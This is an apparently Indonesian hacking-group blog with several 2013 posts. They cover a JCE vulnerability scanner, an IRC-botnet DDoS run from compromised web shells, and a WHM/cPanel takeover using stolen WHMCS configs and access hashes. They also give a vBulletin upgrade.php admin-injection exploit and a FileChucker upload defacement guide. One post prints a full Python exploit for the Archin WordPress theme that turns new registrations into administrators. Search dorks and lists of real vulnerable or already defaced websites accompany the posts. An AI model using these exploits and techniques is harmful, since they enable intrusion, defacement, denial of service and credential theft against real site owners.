Jumat, 20 September 2013

Tools JCE Server Scanner (Python & PHP)

Assalamualaikum...


Berhubung saya lupa2 mulu mo posting ni tools, jadi maaf aja kalo udah telat hehehe :D Fungsi dari tools scanner ini yaitu memudahkan mencari target website dalam satu server yang vulnerable terhadap JCE secara otomatis sehingga tanpa harus mengecek vulnerabilitas webnya satu persatu :) silahkan di sedot aja yah :)

1. JCE Scanner (Python)


2. JCE Scanner (PHP)


Cara penggunaannya cukup simple, untuk menggunakan tools ini sobat harus menginstall Python dan PHP sebagai pendukung, karena kedua tools ini dibuat dari bahasa Python dan PHP :) disini sobat hanya memasukkan IP web targetnya, kemudian biarkan tools bekerja mencari web yang vuln JCE :D untuk tutorial JCE silahkan baca artikel sebelmnya disini Begitu saja yang bisa saya berikan, mudah2an bisa bermanfaat buat sobat semua...

Content Creator : Onix AQua

DDos Attack via IRC / mIRC

Assalamualaikum...

DDoS attack adalah Distributed-Denial-of-Service attack, sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system yang ‘menyerang’ secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-lamanya. Seperti yang kita ketahui bersama bahwa DDos merupakan teknik serangan yang paling ampuh yang digunakan para attacker dalam usaha menghancurkan website website target mereka. biasanya hal ini sering kita jumpai pada operasi operasi cyberwar. Banyak metode metode serang yang bisa digunakan dalam melakukan serangan. Perlu diketahui bahwa teknik DDos ini belum ada obatnya, jadi sangat berbahaya. ( Blablablabla.. onix mulai sok tau, wkwkwk ) Disini saya tidak akan mengulas masalah DDos secara detail, silahkan sobat cari sendiri di google yah,, wkwkwk   :p 

Sedikit cerita nih  sebenarnya saya mempelajari teknik ini memakan waktu hampir satu minggu :( dari awal build server IRCnya sampai load script perlnya ke server dan selama itu saya mengalami banyak kegagalan, terutama di script perl nya yang selalu error (bukan codel sih, jadi ga mudeng) wkwkwkk... :D Tapi itu semua ga pernah membuatku menyerah dalam belajar :) dan akhirnya saya meminta bantuan seorang teman yg nickname nya Antonkill, disitu saya hanya meminta script perl punya dia, dan wow, langsung bisa dah.. jadi kendala saya waktu itu cuma pada script perlnya aja.. wkkwkwwk big thanks aja to beliau :D

Lanjut ke permasalahan utama yah :) oke sekarang saya akan sedikit menjelaskan cara bagaimana teknik DDos yang dilakukan melalui IRC.. kalo saya biasa suka menyebutnya sebagai ZOMBIE :D dan bahan bahan yg sobat butuhkan seperti berikut:

1. Server IRC
3. Web Shelled ( Perl ON and Safemode OFF )
4. mIRC ato sejenisnya :3

Pertama tentunya sobat harus memiliki servernya :v kalo ga punya sebaiknya numpang saja ya di tempat orang jadi ga repot2 beli dan build servernya. punya saya kena suspend :( wkwkwkwk jadi solusinya silahkan sobat daftar aja di Server IRC punya om jatimcom ato di servernya om Hacker-newbie :D

oke silahkan join dulu yah disana :D lalu buat juga channel yg sobat inginkan sebagai tempat tongkrongannya zombie2 nantinya. sebelumnya edit dulu scriptnya,, silahkan dirubah yg penting2 saja :)


kalo sudah semua, langsung  upload script perlnya ke shell sobat.. kemudian eksekusi dengan perintah : perl ddos


nah tunggu aja ntar pasti muncul di channel sobat :)


untuk melihat perintah2nya silahkan sobat ketik : !bot @help lalu !bot @ddos


sekarang saatnya uji coba :D silahkan sobat pilih metode serangannya.

Kalo hasilnya seperti gambar dibawah berarti zombienya bekerja. pokoknya ga pake repot bisa sambil nyantai2  dan ga menguras bandwidh internet sobat,, wkwkkwk :D

Demo punya ane tinggal dikit :3 banyak  yg ilang  kena suspend :(

Untuk hasil yang lebih maksimal, kumpulin aja sebanyak banyaknya :) 
Note : Untuk masalah script perl ddosnya silahkan sobat search di google aja. karena saya tidak punya kuasa untuk mengsharenya disini :) mohon dimaklumi :p

saya kira cukup segitu saja, jika ada kesalahan mohon dikoreksi :) mudah2an bermafaat bagi yang membutuhkan sebagai pengetahuan dan pembelajaran, harap jangan disalah gunakan :3

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua 

Sekian dan Terimakasih :* Wassalamualaikum...



Content Created By Onix AQua


Rabu, 18 September 2013

Hack Web Host Manager (WHM)



Assalammualaikum…

Hallo sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo hacking2an.. hehehe :D  oke sekarang saya mo bahas mengenai cara Hack Web Host Manager (WHM) :p

Apa itu Web Host Manager (WHM) ? >>>> Google aja yah :p

Sebelum itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol :D Nah, Kalo hack WHM, disini kita butuh Config WHMCSnya  :3  ga semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri yah :p  utk config killernya bisa gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita sebelumnya Cara mencari config dalam website

Perhatian!
Tutorial ini dibuat sebagai pengetahuan dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak bertanggung jawab! Use at your own risk! 

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua

Berikut bahan2 yg sobat butuhkan:

  1. Web Shelled 
  2. Whmcs killer 
  3. Config whmcs

Disini saya udah nemu config WHMnya :



 isi dalamnya seperti :



Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!





Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p


Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account


 Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087

cth: 176.32.342.223:2086



udah pada bisa kan?  kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:

Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini




kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.


Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!




kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:

Header Name : Authorization
Header Value : WHM username:AccessHash




 Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start



Setelah itu tinggal sobat buka WHMnya.. IP:Port



Mudah kan? :D semoga saja tutorial ini bermanfaat dan tidak disalahgunakan :) kalo disalahgunakan resiko dan Dosanya tanggung sendiri yah? :p Spesial big thanks to : Mauritania Attacker :* saya dapet ilmu dari blognya :3 dan sekian tutorial dari saya yah,  maaf kalo masih semerawut :D

 









Content Creator : Onix AQua


Selasa, 17 September 2013

vBulletin 4.x.x and 5.x.x Upgrade 0day Exploit

Selamat malam sobat IDCA, kayaknya dunia underground saat ini baru rame-ramenya Exploit vBulletin yaaa, ya udah dah ikut-ikutan ngesahre nih :P

[+] Dork [+]

Inurl://install/upgrade.php
intext:vBulletin 4.2.1 Upgrade System
intext:vbulletin-style.xml

[+] Langkah - Langkah [+]

1. Masukan expoit :/install/upgrade.php
#localhost/path//install/upgrade.php

Tampilan akan seperti ini'


2. Kemudian tekan CTRL + U dan cari Customer ID nya :)


3. Setelah itu, buka vBullein 0day disini, lalu masukan Costumer ID dan data lainnya :)
website diisi, contoh : http://bimo-cyber.org/install/upgrade.php


4. Setelah itu klik Inject Admin, maka tampilan akan seperti berikut 


5. Nah sekarang tinggal login aja deh, login admin vBulletin adalah : /admincp/
#contoh : http://bimo-cyber.org/admincp/


nah udah berhasil login tuh =))

tinggal tebas aja, kalau belum bisa memasang shell bisa download video dibawah ini :)

Untuk cara upload file, bisa download tutorial disini

[+] Web Demo [+]

http://www.3drcforums.com/install/upgrade.php
http://www.cosportbikeclub.org/forums/install/upgrade.php
http://windowssecrets.com/forums/install/upgrade.php
http://passivehouseplus.ie/forum/install/upgrade.php
http://www.aussiemuslims.com/forums/install/upgrade.php
http://www.georgiarcracing.com/install/upgrade.php
http://www.doula.com.au/install/upgrade.php
http://www.ohiovalleydtr.com/install/upgrade.php
http://www.doula.com.au/install/upgrade.php
http://www.barrreport.com/install/upgrade.php
http://www.mabinogiworld.com/install/upgrade.php
http://www.coolminiornot.com/forums/install/upgrade.php
http://www.ukuleleunderground.com/forum/install/upgrade.php
http://www.coronet.dk/install/upgrade.php
http://www.thebagforum.com/install/upgrade.php
http://www.3dallusions.com/forums/install/upgrade.php


Content Created By Bimo Septiawan

Script Ulang Tahun Keren

Selamat sore sobat IDCA, udah lama sekali nih engak coret-coret di blog lagi hehe :D
Untuk kesempatan kali ini, kita tinggalkan dulu soal hacking dan tetek bengeknya :)

Pada kesempatan kali ini, saya akan membagikan script "Ulang Tahun Flash Player" daripada bingung maksud saya apaan, langsung lihat aja penampakan berikut :)




Okay, gimana ? berminat? langsung aja sedot disini gan =))


#Note : Edit dibagian config.xml

Content Created By :  Bimo Septiawan ( Garuda Attacker )

Minggu, 25 Agustus 2013

Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Selamat datang di blog IDCA :D
langsung saja deh, neh saya share trik Deface "Wordpress Theme Archin", tapi karena saya males ngetik jadi saya copas aja blognya si Mr Xenophobic. Ijin ya om XD XD


ok lanjut. berikut tool yang dibutuhkan :

 Python 










install Python, setelah selesai menginstall python, buka notepad dan paste script berikut :

 # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
     
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
save filenya dengan berekstensi .py 
lalu cari target website dengan mengunakan dork berikut :

 /wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/

disini saya anggap anda sudah menemukan targetnya.

buka websitenya, trus di pencet CTRL+U, dan akan muncul tab baru, seperti dibawah ini :
 setelah itu, kita klik url 
http://site.com/wp-content/themes/temanya/style.css
dan ganti style.css menjadi hades_framework/option_panel/ajax.php.
sehingga menjadi seperti ini :
http://site.com/wp-content/themes/temanya/hades_framework/option_panel/ajax.php
 jika website itu blank / tidak ada text apapun berarti itu vuln.
setelah itu buka start ~> Run ~> ketik "cmd" (akan muncul sebuah console / command prompt)

ketik "cd C:\" (karena script yg diatas saya letakkan di local disk)
ketik lagi "filenya.py" dan pencet enter. sehingga menjadi seperti ini :
jika muncul gambar seperti itu, tandanya itu berhasil. dan sekarang yang kita butuhkan adalah registrasi ke target website dengan menuju ke http://targetnya.com/wp-login.php trus klik register (setiap website berbeda bahasanya) untuk itu coba lihat screenshot berikut :
yang digaris merah itu, dalam bahasa inggris adalah register.
nb : jika tidak ada tombol register, brarti website itu mendisablenya.
dan lakukan registrasi seperti biasanya
nb : form yg atas adalah form username dan yg dibawahnya ada form email.

setelah melakukan registrasi, silahkan kalian cek email kalian yg sudah kalian isi di script.
ada kan ? klo ada buka email tersebut lalu buka login pagenya dan login dengan username tersebut.

Sumber : http://blog.xeno-info.tk/2013/08/archin-wordpress-theme-32.html

Senin, 08 Juli 2013

Exploit FileChucker File Upload Vulnerability

Assalamualaikum...

Menjelang datangnya bulan Ramadhan, sebelumnya saya selaku Admin mohon maaf jika ada salah dan khilaf yah,, mungkin emang saya sengaja maupun tidak :)

Oke, saya lanjut berbagi lagi :) disimak aja ;) yah bisa dah sekedar nambahin unique deface di Arsip :D

Dork :
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable


Ayo mulai :) Silahkan sobat mencari target di google dengan menggunakan Dork diatas..


Disini saya sudah menemukan targetnya, yaitu : http://toptown.co.uk/cgi-bin/filechucker.cgi


Kemudian silahkan sobat isi yang perlu diisi filednya :) dan browse jg file depesan sobat :)



Setelah itu klik Begin Upload.. Nah, tunggu aja hasilnya :)
Note: File yang bisa diupload yaitu .htm, .html, .txt, .jpg, .gif


Dan langsung buka file depesan yg sudah diupload tadi : http://site.com/upload/files/file_mu


Sekian tutorialnya yah,, maaf kalo masih acak2an :) yang penting bisa bermanfaat :)
Wassalam,,

Demo :  
http://exhibitfoundryfiles.com/upload/files/idca.html
http://ableprintingco.com/upload/files/idca.html


http://toptown.co.uk/upload/files/idca.html

Content Creator : Onix AQua